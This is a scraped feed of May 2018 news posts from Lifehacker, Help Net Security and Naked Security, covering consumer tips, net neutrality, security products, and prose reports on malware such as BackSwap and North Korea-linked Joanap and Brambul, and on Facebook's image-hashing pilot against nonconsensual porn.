Thursday, May 31, 2018
This Video Is All Your Kid Needs to Understand Climate Science
Lessons on climate change don’t require wonky charts or boring lectures. They can sometimes be as simple—and cute—as an animated video featuring penguins, an elephant seal, and some researchers ready for the freezing temperatures of Antarctica.
That’s the takeaway from this video released during the Hay Festival, which strives to present art and science ideas to help visitors imagine what the world could be in the future. That, of course, involves some explaining on climate change.
Advertisement
The Trans.MISSION series the festival put on in partnership with the Natural Environment Research Council. Message from Antarctica might be its cutest production yet.
The video, created by Emily Shuckburgh, an oceanographer at the British Antarctic Survey, and Chris Haughton, an award-winning author and illustrator, is tailored toward younger viewers. “We were trying to make it accessible as possible,” Haughton told Earther in an email.
The video shows the orange-suited scientists taking ice samples to learn about historic levels of carbon dioxide in the atmosphere. The science can be a little tricky to explain, but this video makes it easy to digest: Little bubbles in ice tell us how much carbon dioxide existed in the atmosphere in years past. The video goes on to explain how scientists have used this information to show that carbon emissions today are off the charts—and what that means for the world around us.
Advertisement
Artists can play a major role in conversations around climate change, collaborating with scientists in the past to create a hope-filled children’s book, this museum-worth visualization of rising temperatures, and much more. The rest of the videos in the Trans.MISSION series, which include lessons on clean air and weather, also use art to captivate audiences in a way that numbers and words sometimes can’t.
Watch the other videos here.
from Lifehacker https://ift.tt/2H56GGJ
Earther Lake Michigan May Get Its First-Ever Tropical Cyclone Tonight | The A.V.
Earther Lake Michigan May Get Its First-Ever Tropical Cyclone Tonight | The A.V. Club The Americans ends as it lived: Tense, affecting, and one of the greats | The Takeout With Gwen’s Peanut Butter Better Sauce, even broccoli is a hit |
from Lifehacker https://ift.tt/2JnqeeN
California Senate votes to restore net neutrality rules
The California State Senate voted yesterday in favor of a bill aimed at restoring the net neutrality protections put in place by the Federal Communications Commission in 2015, and preventing ISPs from engaging in practices that are inconsistent with a free and fair Internet.
These protections were repealed by the FCC in December 2017 and are set to end on June 11, 2018.
About the bill
Senate Bill 822 is sponsored by Democratic Senator Scott Wiener and co-authored by a handful of other California State Democratic senators and assembly members.
It is supported by a broad coalition of public interest groups, labor organizations, social justice advocates, Internet service providers, start-ups and businesses, California mayors and local governments, as well as California residents. Among the supporters are also three former FCC commissioners, including Tom Wheeler, who was the Chairman of the FCC under President Obama.
The bill would, among other things, prevent ISPs from:
- Blocking or slowing access to websites and discriminating against websites or applications.
- Interfering with “a customer’s ability to select, access, and use broadband Internet access service or lawful Internet content, applications, services, or devices of the customer’s choice, or an edge provider’s ability to make lawful content, applications, services, or devices available to a customer.”
- Zero-rating some Internet content, applications, services, or devices.
- Engaging in deceptive or misleading marketing practices that misrepresent their treatment of Internet traffic, content, applications, services, or devices, or the performance characteristics or commercial terms of the broadband Internet access service to its customers.
- Advertising or selling broadband Internet access service without prominently disclosing with specificity all aspects of the service.
It would also allow the California Attorney General to enforce and hold ISPs responsible for violations, and consumers to bring an action under the Consumer Legal Remedies Act to protect their right to an open Internet.
“When Donald Trump’s FCC took a wrecking ball to the Obama-era net neutrality protections, we said we would step in to make sure that California residents would be protected from having their internet access manipulated,” Senator Wiener noted.
“I want to thank the enormous grassroots coalition that is fighting tooth and nail to help pass SB 822 and protect a free and open internet. We have a lot more work to get this bill through the Assembly, but this is a major win in our fight to re-instate net neutrality in California.”
What now?
The State Assembly will begin hearing about the bill in June, and by the end of August they should vote on it. If the majority agrees with the bill, the final decision of whether it should become law rests with California Governor Jerry Brown (also a Democrat).
If the bill becomes law, it will likely get challenged in court, as the FCC included a provision in the 2017 repeal that blocks states from passing their own net neutrality rules. That is, if the repeal does not get repealed first by the US Congress and President Trump.
from Help Net Security https://ift.tt/2LaOAFM
1Password 7: A new design and added security features
AgileBits has released 1Password 7 for Mac and Windows. The password manager is among the most long-lived and popular offerings of its kind out there.
Both the Mac and Windows version sport a new design that puts the important things (i.e. the user’s items, the most important information) into focus and a new custom font that makes it easier to type passwords into another device.
The Mac version continues to support Touch ID and the Windows version Windows Hello for biometrics-based login. Both versions sport a new and even more helpful 1Password mini, and in the Mac version it’s not limited to working with browsers.
“With our new app integration we’ll automatically suggest logins for the current app you’re using. Along with support for drag and drop, this is a real game changer,” AgileBits founder Dave Teare noted. (Users can drag and drop items between vaults and accounts.)
1Password 7 security features
The 1Password Watchtower is now a suite of security tools that notify users of breaches, highlight weak, vulnerable and reused passwords, point out logins that are using an insecure (HTTP) website address, and even warn users about soon-to-expire credit cards and documents.
“Watchtower integrates with Troy Hunt’s haveibeenpwned.com service to see if any of your logins are vulnerable. 1Password securely checks your items against a collection of breached passwords (over 500 million and counting) and notifies you to change them,” Teare explained.
Integration with twofactorauth.org allows Watchtower to know which websites support two factor authentication and to alert users when it finds logins without 2FA enabled.
“Also new in 1Password 7 (for Mac), we’ve taken advantage of Apple’s Secure Enclave to protect your Master Password when Touch ID is enabled. This is incredibly cool because the keys used for encryption are protected by the hardware and not accessible to other programs or the operating system,” Teare shared.
“And if you’re moving over to our new 1Password memberships, syncing your data is more secure than ever. With the addition of a Secret Key, Secure Remote Password, and Galois/Counter Mode, your data has never been safer.”
And for those worried about their passwords being accessible to the company, Michael Fey, Apple Team Lead for 1Password, says “Don’t.”
“The fact of the matter is that with 1Password your passwords are not ‘in the cloud’. What we store on our servers is a fully encrypted data blob that only you have the keys to decrypt,” he told Help Net Security.
“Furthermore, that decryption only ever happens on your devices – neither your master password nor any of the other pieces we use to encrypt your data are ever transmitted to us. Our security page covers all of this in detail, and if you really want to dive into it, our security white paper dives into the nitty gritty,”
from Help Net Security https://ift.tt/2LNsjyD
Wednesday, May 30, 2018
Finally Buy Yourself A Weighted Blanket For Just $86, While It Lasts
Amy Garden Weighted Blanket, 15 pounds | $86 | Amazon | After $11 off coupon
Weighted blankets can work wonders for your anxiety, and you can score an all-time low price on this 15 pound blanket from Amazon today. It’s just $86 after the $11 off coupon, making it the best weighted blanket deal we’ve ever posted. Not to stress you out, but we wouldn’t expect this deal to last for long.
from Lifehacker https://ift.tt/2Ji6rNq
Earther Kilauea Is Making Its Own Weather | The A.V.
Earther Kilauea Is Making Its Own Weather | The A.V. Club Avengers: Infinity War almost included Captain America’s real phone number | The Takeout What should I do with my Mario Batali cookbooks now? |
from Lifehacker https://ift.tt/2slDjvd
How Men Can Learn to Have Healthier Conflict, With Divorce Attorney James Sexton
Our inaugural Livehacker event saw three expert speakers share their perspectives on the question “How should a man be?”
First up, divorce attorney James J. Sexton uses his experience with litigating couples (and as a father and ex-husband himself) to offer insights on what makes men behave badly—in marriage, in divorce, and in life—and how we can begin to heal these toxic behavioral patterns.
from Lifehacker https://ift.tt/2JgfPkR
Vulcan Cyber announces continuous vulnerability remediation platform and $4M seed round
Israeli startup Vulcan Cyber today announced $4 million in seed funding for its mission to eliminate the vulnerability remediation gap that unnecessarily exposes enterprises to massive cyber risk.
Vulcan Cyber co-founders, from left to right: CTO Roy Horev, CEO Yaniv Bar-Dayan and CPO Tal Morgenstern
Backing for the technology platform, which lets security teams gain the insight needed and take the action required to continuously eliminate exposed vulnerabilities in their production systems, comes from YL Ventures with participation from additional prominent cybersecurity investors.
The Vulcan Cyber Continuous Vulnerability Remediation platform eliminates the most critical risks caused by vulnerabilities while at the same time avoiding any unexpected impact to business operations. Vulcan reduces dwell time from weeks and months to hours.
Vulcan Cyber’s data collection aggregates data from dozens of scanning tools while its advanced exposure analytics deliver insight into the true risk of existing vulnerabilities in the deployed enterprise stack. Vulcan then automatically prioritizes, plans, orchestrates and validates remediation.
“Enterprises today are experiencing a state of continuous risk exposure,” said Yoav Leitersdorf, managing partner at YL Ventures, who led the Vulcan Cyber funding round. “This exposure is a board level concern. The speed of change and innovation and volume of constant probes and attacks has simply outpaced the tools and skilled resources IT security teams have. And for many teams, it simply feels like they’re in a never-ending storm of crisis and reactive activities.”
IT security and operations teams today rely on dozens of vulnerability assessment and patch management tools and are using manual processes and custom scripting to tie them together.
By automating the collection and integration of all the relevant vulnerability data from these tools across the enterprise IT stack, and correlating this information with risk exposure, Vulcan provides insight that enables continuous evaluation of exposure and prioritization of remediation. Vulcan then orchestrates patch management, IT service management tools and the teams and tasks needed to continuously remediate the most critical exposure in production environments. Lastly, Vulcan validates remediation effectiveness and feeds the new data back into the insight engine. Vulcan integrates out of the box with all popular scanning, configuration management and patching tools as well as provides open APIs to connect new scanners, tools and feeds into the platform.
“The team at Vulcan has the right vision to deliver IT security teams unprecedented insight and the ability and confidence needed to successfully eliminate exposure and risk. Vulcan has the potential to be transformative for enterprises, taking them from a state of continuous exposure to continuous protection,” Leitersdorf added.
Andy Ellis, CSO of Akamai, concurred, “Organizations today have diverse ecosystems, from on-premise bespoke applications to cloud-deployed services. Keeping track of the state of these applications and systems — often owned by distinct engineering and operations teams — in order to ensure that system maintenance keeps up with the never-ending flow of vulnerabilities and exposures is vital. Continuous and integrated visibility into remediation is the first step to remediation orchestration for enterprises.”
“Vulcan’s approach to enable and empower both IT security teams and their operations counterparts is a leap forward, giving us a vision for a world where companies aren’t being breached every day with exploits against vulnerabilities that have been known about for months or years”, said Ellis.
Yaniv Bar-Dayan, Vulcan Cyber CEO and co-founder explains that vulnerabilities are the “dirty” but critical work of IT security. “It has become almost impossible for CISOs and their teams to understand and manage the significant and systemic risk of vulnerabilities in their production systems, leaving them in a state of continuous exposure. It might sound more glamorous to talk about zero day and next generation threats, but vulnerability remediation is truly where the rubber meets the road. The only way to deal with this continuous risk exposure is through continuous remediation, achieved with robust data collection, advanced analytics, automation, and closed loop remediation planning, orchestration and validation. This is exactly what we are delivering to IT security teams with Vulcan Cyber.”
The Vulcan Platform is currently in limited availability to qualified customers. General availability will be in late 2018. More information about the launch is available in the video below:
from Help Net Security https://ift.tt/2H4mI3o
Attacking hard disk drives using ultrasonic sounds
Another group of researchers has demonstrated that hard disk drives (HDDs) can be interfered with through sound waves, but they’ve also shown that ultrasonic signals (i.e., sounds inaudible to the human ear) can be used to damage their integrity and availability.
Attacking HDDs
HDDs are non-volatile data storage devices that store and retrieve digital information by using rapidly rotating disks coated with magnetic material and magnetic heads that read and write data to the disks’ surfaces. They are usually found in personal computers, cloud servers, consumer electronics, CCTV systems, medical monitors, ATMs, and so on.
Late last year, a group of researchers from Princeton and Purdue University demonstrated a new denial-of-service (DoS) attack against HDDs, which exploited a physical phenomenon known as acoustic resonance.
They showed that vibrations caused by specially crafted acoustic signals can cause significant vibrations in HDDs’ internal components and therefore negatively influence the performance of HDDs embedded in real-world systems.
As effective as they could be, such attacks are unlikely to remain unnoticed. But, according to a recently released paper by researchers from the University of Michigan and Zhejiang University, even ultrasonic signals (above 20 KHz) can bring about physical errors in hard disk drives and therefore lead to system level errors.
Ultrasonic attacks
“A HDD read/write head floats (∼10 nm) above the surface of each spinning disk. Data is organized in tracks that circle the disk. To read or write data, the head stack assembly must position the head above the desired track. There is a narrow margin of error (on the scale of nm) within which the read/write head can operate,” the researchers explained.
“Ultrasonic waves can alter the HDD shock sensor’s output, causing a drive to unnecessarily park its head. Audible tones can vibrate the read/write head(s) and disk outside of operational bounds. Both of these different methods result in improper function of the drive.”
These attacks can be executed via nearby sound emitters and, occasionally, even through the target system’s own built-in speakers (it all depends on their frequency response).
“Ultrasonic attacks are less likely to cause a head crash, but could be damaging the drive in other ways such as causing the head to become unstable over time because of excessive parking. This instability could make the drive less reliable in its reads and writes, leading to sectors being marked as bad,” the researchers noted.
They propose a number of defenses that can be used to detect or prevent these attacks, including a feedback controller that could be easily deployed as a firmware update to attenuate the intentional acoustic interference.
from Help Net Security https://ift.tt/2J1dyqm
Cryptomining apps are on the rise, malicious apps in app stores decline
RiskIQ analyzed 120 mobile app stores and more than two billion daily scanned resources. The findings showed that taking advantage of the popularity and volatility of the cryptocurrency landscape is paying off for threat actors via the mobile attack vector and that malicious apps leveraged by nation-state actors are becoming more prominent.
In Q1 RiskIQ issued an alert, warning of blacklisted apps masquerading as, or associating themselves with Bitcoin exchanges, Bitcoin wallets, or just cryptocurrency in general. These are indicative of the rise of digital currencies and their attractiveness as an income stream for both crooks and legitimate businesses.
The RiskIQ Q1 Mobile Threat Landscape Report also showed that malicious mobile apps continued to decline, despite the number of total apps observed by the company. The last four quarters have increased by hundreds of thousands. In Q1, 21,948, or 1.4%, of the total of 1,508,825 newly observed apps were blacklisted, which is a lower percentage than in the previous four quarters.
The numbers of blacklisted feral apps declined for the fourth-straight quarter, from 3,507 in Q4 2017 to 1,981 in Q1 2018, but still represents a significant portion of all blacklisted apps; forty-six percent of feral apps were blacklisted in Q1 2018.
Meanwhile, Google hosted 8,287 blacklisted apps in Q1, which is consistent with previous quarters and outpaces the next most blacklisted store, AndroidAPKDescargar, by 4,595. Although the Play Store consistently had high numbers of blacklisted apps between Q3 2017 and Q1 2018, its rate of blacklisted apps has hovered around a relatively modest five percent.
The report found that many blacklisted apps shared several of the same permissions. Eighty-six percent of apps blacklisted in Q1 claimed the READ_SMS permission, which allows the app to read messages and can be used for any number of nefarious purposes, including circumventing two-factor authentication.
Most of the apps that can read messages can also track location, read and write to the call log, generate alert windows, change settings and other dubious requests. Among apps blacklisted in the Google Play Store, 1,207 access the phone’s camera, nearly 800 of which also record location data and about 600 record audios.
from Help Net Security https://ift.tt/2sq1ub0
DHS, FBI warn about malware tied to North Korean threat actor
US-CERT has released a new technical alert on malware used by Hidden Cobra, a threat actor whose activities they believe to be directed by the North Korean government.
The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have been documenting malware used by the group for a while now.
This time, they warn about Joanap, a remote access tool (RAT) that is used “to establish peer-to-peer communications and to manage botnets designed to enable other operations”, and Brambul, a brute-force authentication worm that spreads through SMB shares.
“According to reporting of trusted third parties, Hidden Cobra actors have likely been using both Joanap and Brambul malware since at least 2009 to target multiple victims globally and in the United States—including the media, aerospace, financial, and critical infrastructure sectors,” the alert notes.
“Like many of the families of malware used by Hidden Cobra actors, Joanap, Brambul, and other previously reported custom malware tools, may be found on compromised network nodes.”
According to the organization, compromised network nodes identified as part of the Joanap infrastructure are scattered all across the world.
“FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and enable network exploitation. DHS and FBI are distributing these IP addresses and other IOCs to enable network defense and reduce exposure to any North Korean government malicious cyber activity,” it said.
US-CERT advises administrators to make use of the provided indicators of compromise and a malware analysis report to check whether their networks have been compromised, as well as provided general advice on strategies that can mitigate the threat these and other malware can pose to them.
The alert did not name specific targets, but it did contain a link to a separate report by analytics company Novetta, which says the same group was behind the 2014 Sony Pictures Entertainment hack.
from Help Net Security https://ift.tt/2kBBzty
Tuesday, May 29, 2018
Network Critical launches SmartNA-PortPlus, a Packet Broker for ultimate scalability
Network Critical announced SmartNA-PortPlus. This latest Packet Broker is a high density, high performance solution with up to 192 Ports covering 1/10/25/40/100G speeds. It enables organizations to tap into next-generation high speed networks whilst leveraging existing monitoring tool investments, thereby reducing capital expenditure.
Available in September 2018, this network visibility product creates the foundation for understanding what is happening on the network, especially when dealing with a myriad of tools, allowing organizations to better manage and improve the performance of their network.
SmartNA-PortPlus enables 100% visibility of network traffic. This means that huge volumes of network traffic can be aggregated, filtered and load balanced across multiple security and monitoring tools.
The sheer volume of data that organisations are trying to push through the network has swiftly increased in the last few years, as has demand for faster network speeds. That’s because organizations have witnessed a rapid evolution of business applications and systems as well as a shift toward more virtual and cloud computing at a time of ever-increasing threats to the network.
As a result, the network perimeter is fast disappearing as users become more mobile and organisations do more business in the cloud. Additionally, stringent government and industry regulations require stricter data center controls to ensure compliance.
In this environment the need to observe all traffic, prevent malicious activity and ensure a high performance network is critical. SmartNA-PortPlus helps to ‘bridge the gap’ in organisations who have differing network traffic speeds and whose security and monitoring tools have differing capabilities to receive traffic. Because the product can effectively handle traffic at 1/10G and 25G as well as 40G and 100G, and features an enormous 1.8 Tbps system throughput, it can act as the central hub to gather vast quantities of data and distribute it to the right tools.
“We enable organizations to send the right traffic to the right tools and to do this quickly and robustly. With our SmartNA-PortPlus we have extended the diversity of ports at a lower cost to provide ultimate scalability for our clients. This increase in ports means that the SmartNA-PortPlus™ product will disrupt the market because it delivers scalability, flexibility and affordability, enabling companies to future proof their network and scale at a pace and size that suits their needs,” said Alastair Hartrup, Global CEO of Network Critical.
Other key features include Network Critical’s patented Drag-n-Vu technology, which allows organizations to filter traffic based on IP addresses, protocols, ports and VLANs to provide improved network visibility. Drag-n-Vu also makes it easy to add complex filter rules and port mapping, virtually eliminating configuration time as well as costly mistakes.
““What’s really disruptive about the SmartNA-PortPlus is that we are now making 100G capabilities more broadly available to a much wider market. Previously this technology was only really suitable for those with sizable networks and deep pockets,” concluded Hartrup.
from Help Net Security https://ift.tt/2kzG8EM
Earther Mind-Boggling Canyons Discovered Beneath Antarctica’s Ice | The A.V.
Earther Mind-Boggling Canyons Discovered Beneath Antarctica’s Ice | The A.V. Club A temporary resurrection for Lucifer makes another strong case for more stories | The Takeout Talking “craft beer sellouts” with the guy who wrote the book on them |
from Lifehacker https://ift.tt/2xxfbLl
BackSwap Trojan exploits standard browser features to empty bank accounts
Creating effective and stealthy banking malware is becoming increasingly difficult, forcing malware authors to come up with innovative methods. The latest creative burst in this malware segment comes from a group that initially came up with malware stealing cryptocurrency by replacing wallet addresses in the clipboard.
About the BackSwap banking malware
“To steal money from a victim’s account via the internet banking interface, typical banking malware will inject itself or its specialized banking module into the browser’s process address space,” ESET malware researcher Michal PosluÅ¡ný notes.
The success of this approach depends on the injection not be detected by security solutions, modules matching the bitness of the target browser, and the banking module hooking browser functions, and their location varies from browser to browser.
BackSwap eschews the usual “process injection for monitoring browsing activity” trick. Instead, it handles everything by working with Windows GUI elements and simulating user input.
“This might seem trivial, but it actually is a very powerful technique that solves many ‘issues’ associated with conventional browser injection,” the researcher notes.
“First of all, the malware does not interact with the browser on the process level at all, which means that it does not require any special privileges and bypasses any third-party hardening of the browser, which usually focuses on conventional injection methods. Another advantage for the attackers is that the code does not depend either on the architecture of the browser or on its version, and one code path works for all.”
BackSwap monitors the visited URLs, looks for and detects bank-specific URLs and window titles by hooking key window message loop events.
Once banking activity is detected, the malware injects malicious JavaScript into the web page, either via the browser’s JavaScript console or directly into the address bar (via JavaScript protocol URLs, a little-used feature supported by most browsers). Also interesting is that the malware cleverly bypasses several countermeasures browser makers have implemented to prevent the exploitation of that last feature.
Finally, the injected JavaScript replaces the recipient’s bank account number with the number of an account opened by the attackers or their mules. If the user doesn’t notice the switch and authorizes the transaction, the attack is successful.
BackSwap distribution
At the moment, the malware is made to target customers of five Polish banks (PKO Bank Polski, Bank Zachodni WBK S.A., mBank, ING and Pekao), and will only steal money if the wire transfer amount is between 10,000 and 20,000 Polish zloty (i.e., $2,800 – $5,600).
The targets get infected with the malware by opening malicious attachements attached to spam email, containing the Nemucod or other downloader Trojans.
“The payload is delivered as a modified version of a legitimate application that is partially overwritten by the malicious payload. The application used as the target for the modification is being changed regularly – examples of apps misused in the past include TPVCGateway, SQLMon, DbgView, WinRAR Uninstaller, 7Zip, OllyDbg, FileZilla Server,” the researcher shared.
The app is modified to jump to the malicious code during its initialization and control is transferred to the malware (the legitimate app will not work).
According to Poslušný, the intent of this approach is not to fool users into thinking they are running the legitimate app, but to minimize the possibility of the malware being detected and analyzed.
“This makes the malware harder for an analyst to spot, as many reverse engineering tools like IDA Pro will show the original main() function as a legitimate start of the application code and an analyst might not notice anything suspicious at first glance,” he explained.
from Help Net Security https://ift.tt/2L3j649
Tuesday review – the hot 22 stories of the week
from Naked Security https://ift.tt/2GYsJil
Facebook now supports 2FA via authenticator apps
Facebook has good news for users who wish to secure their accounts with two-factor authentication but aren’t comfortable sharing their phone number with the social network: there’s now an option to use authenticator apps to receive the second authentication factor.
The move was announced on Wednesday by Facebook’s product manager Scott Dickens.
“We previously required a phone number in order to set up two-factor authentication, to help prevent account lock-outs. Now that we have redesigned the feature to make the process easier to use third-party authentication apps like Google Authenticator and Duo Security on both desktop and mobile, we are no longer making the phone number mandatory,” he said.
The National Institute of Standards and Technology (NIST) is advising against using SMS-based two-factor authentication as the method is vulnerable to attack.
An attacker can convince the mobile operator to redirect the victim’s mobile phone to the attacker and receive the code via SMS. Or, a malicious app on the endpoint can harvest information sent via SMS.
Dickens did not mention how many users already enabled 2FA via SMS.
How to set up Facebook 2FA via Authentication App
The process of enabling two-factor authentication has also been streamlined.
Users are required to go to Settings > Security and Login, press the Edit button next to the Use two-factor authentication option, and follow the instructions provided once they press the Get Started button.
Users should choose the 2FA via Authentication App option, can set up by simply scanning the offered QR code (see image above), and then confirm the set up by entering the confirmation code provided by the app. They are also give the option of allowing logins without a code for 1 week or not.
Once 2FA is set up, Facebook will ask for the login code any time users log in on a phone or computer the service does not recognize.
from Help Net Security https://ift.tt/2IUU1fa
Monday, May 28, 2018
Week in review: VPNFilter, hacking BMW cars, verifying data processing for privacy and GDPR
Here’s an overview of some of last week’s most interesting news and articles:
The percentage of open source code in proprietary apps is rising
The number of open source components in the codebase of proprietary applications keeps rising and with it the risk of those apps being compromised by attackers leveraging vulnerabilities in them, a recent report has shown.
VPNFilter malware compromises over 500,000 networking devices around the world
Cisco Talos researchers have flagged a huge botnet of small and home office routers and NAS devices, capable of collecting communications and data and launching cyber attacks.
GDPR: Today is the day
As GDPR becomes enforceable, we sat down with Jerry Caponera, VP Cyber Risk Strategy, Nehemiah Security, to talk about this important regulation and its wide-ranging impact.
Microsoft will extend GDPR rights to customers worldwide
Known as Data Subject Rights, they include the right to know what data we collect about you, to correct that data, to delete it and even to take it somewhere else.
Security spring cleaning: Tidying up messy firewall rules to reduce complexity
Most security teams are waging a daily battle against complex IT infrastructures, advanced malware and a severe skills shortage – a trifecta that has forced them to tackle select “priorities,” while letting other important initiatives fall by the wayside. One such task that usually falls to the bottom of the security “to-do” list is firewall rule cleanup.
Verifying data processing for privacy and GDPR
GDPR is having its moment in the public discourse. However, those who work to protect Identity data have been fretting about the critical components of the regulations for some time. Specifically, the “Article 30 Record-Keeping Requirement,” aims to provide evidentiary proof for how a company processes their personal data. The challenge for organizations in documenting their data processing activities is how do you do that in a data-driven way.
Researchers hack BMW cars, discover 14 vulnerabilities
Keen Security Lab researchers have discovered fourteen vulnerabilities affecting a variety of BMW car models. The flaws could be exploited to gain local and remote access to infotainment (a.k.a head unit), the Telematics Control Unit (TCU or TCB) and UDS communication, as well as to gain control of the vehicles’ CAN bus.
How a URL shortener allows malicious actors to hijack visitors’ CPU power
URL shorteners are often used by malware peddlers and attackers to trick users into following a link they otherwise wouldn’t. But Coinhive’s URL shortener carries an added danger: your CPU power can be surreptitiously hijacked to mine Monero.
Fortnite is coming to Android, but malicious fake apps are already there
Android users eager to play the increasingly popular Fortnite survival game on their mobile devices are being targeted left and right with malicious apps masquerading as the game or apps related to it.
European users can request a copy of the data Apple keeps on them
Apple has set up a Data and Privacy portal where users can make a request to download all the data Apple has on them, correct their personal information, deactivate or delete their account.
Fraud data shows 680% spike in fraudulent mobile app transactions
The number of fraudulent transactions originating from a mobile app during the first quarter has increased by 200 per cent since 2015, according to RSA Security. Analysis from the team also indicated that abuse of social media platforms is a growing problem, with social media replacing the dark web as the top hacker marketplace.
Fighting ransomware with network segmentation as a path to resiliency
Recent cybersecurity events involving the use of ransomware (WannaCry and similar variants) represent the latest examples highlighting the need for organizations to not only take an initial hit, but survive, adapt, and endure. In other words, be resilient.
Whitepaper: Future-proofing your password policy
This whitepaper weighs conventional best practices against the new Digital Identity Guidelines from NIST.
Crypto Me0wing attacks: Kitty cashes in on Monero
It’s been a month since the first Drupalgeddon 2.0 RCE (SA-CORE-2018-002/CVE-2018-7600) exploit was first published, unleashing its destruction into the wild… and through our cloud monitoring systems. As expected, since then we’ve been picking up various attack variants piggybacking on the Drupalgeddon 2.0 exploit, including remote scanners and backdoor attempts. In accordance with the latest dark web app hype, it wasn’t long until we started picking up cryptojacking exploit attempts directed at remote servers as well.
New Spectre-like flaw found in CPUs using speculative execution
CVE-2018-3639, discovered by independently by Google Project Zero and Microsoft Security Response Center researchers and dubbed “Variant 4,” is a Speculative Store Bypass (SSB) vulnerability, and is considered to be a new variant of the previously revealed Spectre Variant 1 vulnerability.
America’s most cyber insecure cities exposed
Coronet researchers identified Las Vegas, Memphis and Charlotte as America’s most cyber insecure cities.
The ethical and legal dilemmas of threat researchers
Threat intelligence is mainstreaming into a de-facto everyday tool of cyber-defense. But all that intelligence must be collected, analyzed, and prepared by someone. Enter threat researchers, the advanced scouts of cybersecurity.
PCI Security Standards Council publishes PCI DSS 3.2.1
PCI DSS version 3.2.1 replaces version 3.2 to account for effective dates and SSL/early TLS migration deadlines that have passed.
New infosec products of the week: May 25, 2018
A rundown of infosec products released last week.
from Help Net Security https://ift.tt/2J7x9sa
Sunday, May 27, 2018
Saturday, May 26, 2018
FBI issues VPNFilter malware warning, says “REBOOT NOW” [PODCAST]
from Naked Security https://ift.tt/2INJxy2
Friday, May 25, 2018
Skip 'Hey Guys!' YouTube Video Intros With These Two Handy Hotkeys
You’ve subscribed to their YouTube channel, you’ve smashed that like button countless times, and maybe you’ve even donated some cash to their Patreon. Still, you have to listen to the same exact video intro all YouTubers use for some reason every single time. Behold, two hotkeys that will save you from having to hear “Hey, what’s up guys?” ever again.
Which hotkeys you use will depend on how long a YouTube channel’s intros usually are. You probably have an idea if you’ve watched a few videos on their channel.
If intros are usually long...
Hit the (1) key on your keyboard. This will take you a full 10 percent into the video, bypassing all that stuff you’ve heard time and time again, says Redditor u/IssphitiKOzS. In fact, each number key (0) through (9) correlates to a percentage in the video, 0 percent to 90 percent. So, if intros are insanely long, hit the (2) key to go to the 20 percent mark.
If intros are quick, but still grating...
Hit the (right arrow) key or the (l) key on your keyboard. This will send you forward 5 seconds and 10 seconds, respectively. If you prefer, you can simply smash the right arrow key over and over until it looks like the video has actually started.
If you want to learn more helpful YouTube hotkeys—like changing volume, moving a video frame by frame, or quick, mouse-free muting and unmuting—you can check them all out here.
from Lifehacker https://ift.tt/2KUytvO
Earther This Climate Visualization Belongs in a Damn Museum | The A.V.
Earther This Climate Visualization Belongs in a Damn Museum | The A.V. Club Some maniac set the entirety of Rush’s “2112” to old Peanuts clips | The Takeout Put down the shake, Jack LaLanne: You don’t need all that extra protein |
from Lifehacker https://ift.tt/2sddT23
Facebook’s counterintuitive way to combat nonconsensual porn
In November 2017, Facebook came up with a way to help us keep our nude photos from being shared without our consent.
It sounded crazy: in order to save us from revenge/nonconsensual porn, Facebook wanted us to send in our nude photos.
But it actually made sense: Facebook would create hashes of our nude images, just like law enforcement uses hashes of known child abuse imagery.
Facebook promised that it wouldn’t store the nudes itself but would instead use photo-matching technology to tag the images after they’re sent in. Then, if somebody tried to upload that same image, which would have the same digital footprint or hash value, it would be stopped dead in its tracks before being uploaded.
People can already report intimate images that have been shared without their consent. Such images are removed, and Facebook creates the hash so its systems can automatically recognize an image and block it if somebody tries to post the image again.
But Facebook says it can do more to keep nudes from being shared on its services in the first place.
On Tuesday, Facebook Global Head of Safety Antigone Davis announced that this week, Facebook’s testing a proactive reporting tool, in partnership with an international working group of safety organizations, survivors, and victim advocates, including the Australian Office of the eSafety Commissioner, the Cyber Civil Rights Initiative and The National Network to End Domestic Violence (NNEDV) in the US, the UK Revenge Porn Helpline, and YWCA Canada.
The pilot program first launched in Australia. Now, it’s also going to be tested in the UK, the US and Canada.
Facebook’s work on the project has included Davis and her team traveling to nine countries across four continents, from Kenya to Sweden, listening to stories about the abuse and cruelty that women face online. While people of all genders, ages and sexual orientations are targeted, Davis notes that women are nearly twice as likely to be targeted with nonconsensual/revenge porn as men.
From her public post:
From anxiety and depression to the loss of a personal relationship or a job, this violation of privacy can be devastating.
The photo hashing project is a work in progress, but here’s how it works now:
- Contact one of Facebook’s partners to submit a form: see the links above.
- You’ll then receive an email containing what Facebook says is a secure, one-time upload link.
- Use the link to upload images you fear will be shared.
- A “specifically trained” human – just one, Facebook said – from its Community Operations Safety Team will review the image to make sure it violates Facebook policy against nudity and sexuality. If it does, they’ll create a hash that will allow the platform to identify future uploads of the image(s) without keeping copies of them on its servers.
- Facebook will then notify victims via email and will delete the images from its servers “no later” than within a week.
- Facebook will store the hashes so any time someone tries to upload an image with the same hash, it will be blocked on its services – that includes Facebook, Instagram or Messenger.
True, initially, you do have to hand over the photo in question in order to create the hash. But after that, the hash will be able to help the online platform more or less instantly answer the question “Do I know that photo?” – and to block its reposting – without you having to send the photo again.
The initial Australian pilot raised questions that Facebook has since tried to tackle. For example, what about false reporting? What safeguards are in place to ensure that people can’t take any old picture they want – a non-porn publicity photo, for example – and send it in, under the false premise that it’s a nude and that it’s a photo they themselves have the rights to have expunged from social media circulation?
As Facebook’s Chief Security Officer Alex Stamos tweeted in November, that’s why we have to trust the humans whose eyes will be reviewing the photos …and why those photos won’t be blurred:
In recognition of that risk, we have taken the steps we can to protect this data and to only retain non-reversible… twitter.com/i/web/status/9…
—
Alex Stamos (@alexstamos) November 09, 2017
Do you trust Facebook with content as sensitive as this? It’s record on privacy isn’t good but its record on security is.
I’m inclined to think that this is a good step, at any rate. Hashing is an important tool in the battle to keep child abuse imagery offline, and it makes sense to apply it in the battle against revenge porn.
A primer on image hashing
This is how it works: A hash is created by feeding a photo into a hashing function. What comes out the other end is a digital fingerprint that looks like a short jumble of letters and numbers. You can’t turn the hash back into the photo but the same photo, or identical copies of it, will always create the same hash.
So, a hash of your most intimate picture is no more revealing than this:
48008908c31b9c8f8ba6bf2a4a283f29c15309b1
Since 2008, the National Center for Missing & Exploited Children (NCMEC) has made available a list of hash values for known child sexual abuse images, provided by ISPs, that enables companies to check large volumes of files for matches without those companies themselves having to keep copies of offending images.
Microsoft at one point donated its PhotoDNA technology to the effort. Facebook’s likely using its own sophisticated image recognition technology for the nude-images project, but it’s instructive to look at how PhotoDNA works.
